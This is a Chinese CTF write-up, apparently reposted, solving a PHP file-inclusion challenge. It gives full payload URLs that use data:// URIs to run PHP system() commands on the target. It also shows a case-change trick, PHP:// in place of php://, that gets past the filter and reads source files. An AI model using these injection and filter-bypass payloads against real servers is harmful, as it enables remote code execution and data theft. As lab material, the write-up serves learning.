CTF-攻防世界-Web_php_include(PHP文件包含)

时间:2020-03-05 13:27:07   收藏:0   阅读:595

题目和进入题目出现的页面:

技术分享图片       技术分享图片

从给出的代码来看,参数名是page,并且过滤了php协议。正好之前学过文件包含漏洞,看能不能学以致用。。。

 

输入:http://111.198.29.45:54883/index.php?page=data:text/plain,%3C?php%20phpinfo();?%3E

返回phpinfo页面,并找到了apache日志的路径:

技术分享图片

尝试访问一下日志文件,如果能访问的话,就可以像https://www.cnblogs.com/sallyzhang/p/12221089.html里那样,利用日志来注入

输入:http://111.198.29.45:54883/index.php?page=日志路径/日志文件名

错误日志和访问日志都没法访问到,应该是木有访问权限,这条路不通。

 

接下来使用PHP伪协议,php://已经被过滤了(hmmm......这其实是不是在侧面提醒咱要用协议来解题啊 >_<,抱歉我才反应过来...)

输入:http://111.198.29.45:54883/index.php?page=data:text/plain,<?php system(ls);?>

返回了一个叫fl4g.....php的可疑文件

技术分享图片 

输入:http://111.198.29.45:54883/index.php?page=data:text/plain,<?php system(cat fl4gisisish3r3.php);?>

返回:500(再用base64编码试了下,还是返回500)

技术分享图片

换成这个: http://111.198.29.45:54883/index.php?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php (代码过滤了php://,但没有过滤PHP://  ^_^)

读取成功,解码得到flag。

技术分享图片

 

原文:https://www.cnblogs.com/sallyzhang/p/12411688.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!